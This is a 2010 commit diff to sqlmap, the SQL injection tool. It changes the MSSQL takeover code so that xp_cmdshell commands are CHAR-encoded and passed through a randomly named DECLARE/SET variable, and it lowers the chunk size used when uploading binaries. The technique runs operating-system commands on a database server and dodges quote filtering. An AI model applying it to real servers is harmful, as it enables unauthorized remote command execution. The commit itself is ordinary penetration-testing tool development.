Closes #111 (DECLARE/CHAR encode xp_cmdshell parameter in MSSQL).

bdamele · bdamele · commit c7c84c3089e2 · 2010-11-02T15:31:51.000Z
diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
@@ -13,6 +13,7 @@
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.exception import sqlmapUnsupportedFeatureException
+from lib.core.unescaper import unescaper
 from lib.request import inject
 from lib.techniques.blind.timebased import timeUse
 
@@ -96,9 +97,13 @@ def __xpCmdshellCheck(self):
             return False
 
     def xpCmdshellForgeCmd(self, cmd):
-        forgedCmd = "EXEC %s '%s'" % (self.xpCmdshellStr, cmd)
+        self.__randStr = randomStr(lowercase=True)
+        self.__cmd = unescaper.unescape("'%s'" % cmd)
+        self.__forgedCmd = "DECLARE @%s VARCHAR(8000); " % self.__randStr
+        self.__forgedCmd += "SET @%s = %s; " % (self.__randStr, self.__cmd)
+        self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)
 
-        return forgedCmd
+        return self.__forgedCmd
 
     def xpCmdshellExecCmd(self, cmd, silent=False):
         cmd = self.xpCmdshellForgeCmd(cmd)
diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py
@@ -192,7 +192,7 @@ def updateBinChunk(self, binaryData, tmpPath):
         forgedScrLines = []
         cmd            = ""
         charCounter    = 0
-        maxLen         = 4096
+        maxLen         = 512
 
         logger.debug("generating binary file %s\%s, wait.." % (tmpPath, chunkName))
 
